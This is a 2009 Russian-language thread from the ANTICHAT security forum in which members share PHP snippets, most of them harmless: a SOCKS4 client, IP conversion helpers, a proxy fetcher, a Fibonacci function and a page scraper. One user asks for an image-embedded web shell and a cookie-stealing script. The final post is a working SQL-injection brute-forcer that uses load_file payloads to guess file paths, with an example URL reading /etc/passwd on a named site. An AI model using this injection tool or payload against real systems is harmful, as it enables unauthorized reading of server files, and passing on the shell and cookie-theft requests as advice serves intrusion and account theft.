ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.01.2009, 17:52
|
|
Познающий
Регистрация: 29.02.2008
Сообщений: 45
Провел на форуме:
162965
Репутация:
6
|
|
PHP код:
<?php
set_time_limit(0);
//фyнкция для socks4, пocлe кoтopoй paбoтa вeдeтcя aнaлoгичнo fsockopen()
//в cлyчae нeyдaчи вoзвpaщaeт false, кoд oшибки($errno), oпиcaниe oшибки($errstr)
function socks4_open($socks4_h, $socks4_p, $host, $port, &$errno, &$errstr, $timeout=30)
{
if (!($connect = fsockopen($socks4_h, $socks4_p, $errno, $errstr, $timeout))) return false;
$q = pack('C2', 0x04, 0x01);
$q .= pack('n', $port);
if (preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/", gethostbyname($host), $arr))
$q .= pack('C4', $arr[1], $arr[2], $arr[3], $arr[4]);
$q .= 0;
$q .= pack('C', 0);
if (!fputs($connect, $q)) return false;
if (!($otv = fgets($connect, 9))) return false;
$otv = unpack('Cvn/Ccd', substr($otv, 0, 2));
if (0 != $otv['vn']) return false;
if (90 == $otv['cd']) return $connect; else return false;
}
//пpимep зaпpoca
$q = "GET / HTTP/1.0\r\nHost: mail.ru\r\n\r\n";
//пpимep paбoты socks4_open()
$connect = socks4_open("216.114.194.19", 1080, 'mail.ru', 80, $errno, $errstr, 30);
if (!$connect)
{
echo "$errstr ($errno)<br>\n";
}
else
{
fputs($connect, $q);
while (!feof($connect))
{
$answer .= fgets($connect, 1024);
}
fclose($connect);
}
echo $answer;
?>
Последний раз редактировалось kik8888; 15.02.2009 в 15:01..
|
|
|
25.01.2009, 20:33
|
|
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
Провел на форуме:
2364957
Репутация:
479
|
|
У кого нибудь есть реггер сайтов на народе? типа ввёл список юзернеймов и сидишь вводишь капчи?
|
|
|
|
25.01.2009, 20:50
|
|
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999
Репутация:
444
|
|
Сообщение от ntldr
У кого нибудь есть реггер сайтов на народе? типа ввёл список юзернеймов и сидишь вводишь капчи?
здесь глянь http://www.nulled.ws/showthread.php?t=55308
|
|
|
|
25.01.2009, 22:27
|
|
Познающий
Регистрация: 29.02.2008
Сообщений: 45
Провел на форуме:
162965
Репутация:
6
|
|
Аналоги функции mysql: INET_ATON, INET_NTOA.
на php, может кому пригодится:.
PHP код:
<?
function inet_aton($ip){
$ip = ip2long($ip);
($ip < 0) ? $ip+=4294967296 : true;
return $ip;
}
function inet_ntoa($int){
// long2ip принимает на вход также беззнаковые
// INT, т.е. полностью идентичен inet_ntoa
return long2ip($int);
}
//пример работы
$ip=array();
$ip[]='255.255.255.255';
$ip[]='0.0.0.1';
$ip[]='0.0.0.0';
$ip[]='127.0.0.1';
$ip[]='251.56.5.210';
$ip[]='255.56.5.210';
$ip[]='10.0.0.1';
$ip[]='192.168.0.1';
$ip[]='191.168.0.1';
$ip[]='193.168.0.1';
foreach ($ip as $v){
echo $v." -> ".inet_aton($v)." | ".inet_aton($v)." -> ".inet_ntoa(inet_aton($v))."<br>\n\r";
}
?>
|
|
|
|
26.01.2009, 22:54
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Нарыл у себя функцию получения страницы с возможностью работы через http-proxy:
PHP код:
function socket_do($action, $method, $headers, $query = '', $proxy = '')
{
$fp = '';
$head = '';
$action = str_replace('http://', '', $action);
$for_s_conn = substr($action, 0, strpos($action, '/'));
$method = strtoupper($method);
if(!empty($proxy))
{
$ex = explode(':', $proxy);
if(!$fp = @fsockopen($ex['0'], $ex['1'], $errno, $errstr, 15))
die($errstr);
}
else
{
if(!$fp = @fsockopen($for_s_conn, 80, $errno, $errstr, 15))
die($errstr);
}
if($method == 'POST')
{
$head = "POST http://$action HTTP/1.1\r\n";
$head .= "Content-length: ".strlen($query)."\r\n";
}
elseif($method == 'GET')
$head = "GET http://$action HTTP/1.1\r\n";
else
die('Выбран не существующий метод');
$head .= "Connection: close\r\n";
$head .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5\r\n";
$head .= "Host: $for_s_conn\r\n".implode("\r\n", $headers)."\r\n\r\n";
if($method == 'POST')
$head .= $query;
if(@!fwrite($fp, $head))
{
die($errstr);
}
$result = '';
while(!feof($fp))
$result .= @fgets($fp, 8196);
fclose($fp);
return $result;
}
|
|
|
|
28.01.2009, 03:17
|
|
Новичок
Регистрация: 30.07.2008
Сообщений: 18
Провел на форуме:
268783
Репутация:
0
|
|
есть у кого нибудь скрипт ,что при вставлении в картинку и заливки на сервер откроет все его директории и может скачать файлы.
также нужен хороший скриптик угона кук )
Последний раз редактировалось Mirella; 28.01.2009 в 03:20..
|
|
|
|
28.01.2009, 04:04
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от Mirella
есть у кого нибудь скрипт ,что при вставлении в картинку и заливки на сервер откроет все его директории и может скачать файлы.
также нужен хороший скриптик угона кук )
1. а ключ от квартиры где деньги лежат?
мб ты имел ввиду шелл, который можно залить с нужным именем а потом исполнить?
2. что значит скрипт угона кук ? в смысле гейт куда будут приниматся угнаные?
|
|
|
|
29.01.2009, 15:09
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
задания для РОА
Задание: хранимая функция MySQL для чисел фибоначи.
SELECT FIBONACHI(5);
Код:
delimiter $$
create function fibonacci(n INT)
returns int
BEGIN
declare fib int;
declare x int;
declare y int;
set x = 0;
set y = 1;
set fib = 0;
while n > 0 do
set x = y;
set y = fib;
set fib = x + y;
set n = n - 1;
end while;
return (fib);
end$$
delimiter ;
select fibonacci(5);
Задача: Написать программу выполняющее деления одного числа на другое столбиком (как в младших классах школы)
Вывод: результат, остаток
Изменил скрипт
PHP код:
<?php
$input = file('input.txt');
$output = fopen('output.txt', 'w');
foreach ($input as $lines => $line)
{
list($num1,$num2) = explode(" ", $line);
if ( $num2 == 0)
{
fwrite($output, "Division by 0\n");
}
else
{
$result = floor($num1 / $num2);
$result1 = $num1 % $num2;
fwrite($output, $result . " " . $result1 . "\n");
}
}
?>
Последний раз редактировалось nicusor; 02.02.2009 в 13:21..
|
|
|
|
29.01.2009, 18:52
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872
Репутация:
186
|
|
Парсер (граббер) bash.org.ru
PHP код:
<?php
$page = file_get_contents('http://bash.org.ru/');
preg_match_all('|<div>(.+)</div>|',$page,$result);
echo $result[1][rand(0,9)];
?>
|
|
|
|
29.01.2009, 22:55
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Написал брутер путей в инъекциях при file_priv= on, может кому-нибудь пригодится...
http://forum.antichat.ru/thread49775.html -- здесь можно собрать неплохой словарик для скрипта
PHP код:
<form action="" medhod="get">
Injection:<input type="text" size= name="host"><br>
<input type="submit" value="Send">
</form>
<?php
/* В поле "Injection" требуется ввести строку с подобранным количеством полей
и в принтабельном поле ввести <file> ;
=Пример=
имеется инъекция, с возможностью чтения файлов:
http://www.jfanow.org/jfanow/index.php?mode=P&id=-2913+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*
Следовательно, в форму нужно добавить:
http://www.jfanow.org/jfanow/index.php?mode=P&id=-2913+union+select+1,<file>,3,4,5,6,7/*
P.S.
#=Gr3tzz to Grey =#
#Coded by IceAngel_# */
set_time_limit(0);
$dic = file("words.txt"); //словарь с путями
if (isset($_GET['host'])){
foreach ($dic as $patch ){
$patch = str_replace("\n", "", trim($patch));
$test = str_replace("<file>", "if(load_file(0x".bin2hex($patch).")+is+null,null,3705)", $host);
$s = file_get_contents($test);
if (strpos($s,'3705'))
{ echo $patch."<br>";}}}
?>
Последний раз редактировалось Iceangel_; 29.01.2009 в 23:07..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид